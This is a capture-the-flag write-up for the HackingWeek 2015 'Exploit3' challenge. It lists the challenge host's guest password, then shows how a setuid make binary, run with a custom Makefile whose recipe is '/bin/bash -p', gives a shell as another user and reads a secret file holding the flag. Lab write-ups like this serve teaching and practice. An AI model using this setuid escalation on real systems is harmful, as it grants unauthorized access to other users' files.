English [HackingWeek 2015] [Exploit3] Write Up

Description

Log on as guest (password: shu1eKoo) on machine 37.187.22.21.
You will find the hidden validation key in /home/exploit03/.secret.

$> ssh guest@37.187.22.21

Resolution

The goal of this challenge is to read the /home/exploit03/.secret file wich is read only for the exploit03 user, and contains the flag.

By listing the /home/exploit03/project/ directory, we can see these files :

guest@ns314076:/home/exploit03/project$ ls -la
total 1704
dr-xr-xr-x 2 exploit03 exploit03 4096 Apr 30 23:47 .
dr-xr-xr-x 3 exploit03 exploit03 4096 Apr 29 15:47 ..
-r-sr-sr-x 1 exploit03 exploit03 549452 Apr 29 15:46 make
-r--r--r-- 1 exploit03 exploit03 1176037 Apr 30 23:47 make-3.81-alpha.tar.bz2
-r--r--r-- 1 exploit03 exploit03 269 Apr 29 15:46 Makefile
guest@ns314076:/home/exploit03/project$

There are three files : make, make-3.81-alpha.tar.bz2 and Makefile. The most interesting thing here is the make binary which is setuid, meaning that every time we launch this binary, we will automatically have the exploit03 rights. Pretty interesting, knowing that we have to read an exploit03’s file :).

So, with this piece of information, what can we do ? Launch the make binary ? OK, but it won’t read the .secret file. It only reads the Makefile file in order to know what to do.
It would be cool to modify the Makefile in order to insert something like… /bin/sh ? 😉
Unfortunately, the Makefile is read-only, meaning that we can’t modify it. Pretty annoying isn’t it ?

But hey wait a minute !? THIS Makefile is read-only, what about creating our own Makefile and use it instead of this useless Makefile ?
OK Let’s try this !

First, we have to man make, in order to be sure that we can use Makefile which is in another directory.


guest@ns314076:/home/exploit03/project$ man make

NAME
make - GNU make utility to maintain groups of programs

SYNOPSIS
make [ -f makefile ] [ options ] ... [ targets ] ...

[...]

-f file, --file=file, --makefile=FILE
Use file as a makefile.

hmmm… Seems pretty good no ?! Now we just have to create a new Makefile :


guest@ns314076:/home/exploit03/project$ cd /tmp
guest@ns314076:/tmp$ mkdir me
guest@ns314076:/tmp$ cd me
guest@ns314076:/tmp/me$ nano Makefile
guest@ns314076:/tmp/me$ cat Makefile
CP = /bin/cp
CHMOD = /bin/chmod

DIR = make-3.81-alpha

.PHONY: install clean

all: $(DIR)/make

$(DIR)/make:
/bin/bash -p

and to launch the make with this new awesome Makefile. If everything is going well, we should have a shell with exploit03 rights and read the .secret file !

guest@ns314076:/tmp/me$ /home/exploit03/project/make -f ./Makefile all
/bin/bash -p
bash-4.2$ cat /home/exploit03/.secret
uY2Waed3ie
bash-4.2$ exit
exit

Perfect ! The flag of this chall is uY2Waed3ie

Enjoy

The lsd

Leave a Reply

Your email address will not be published.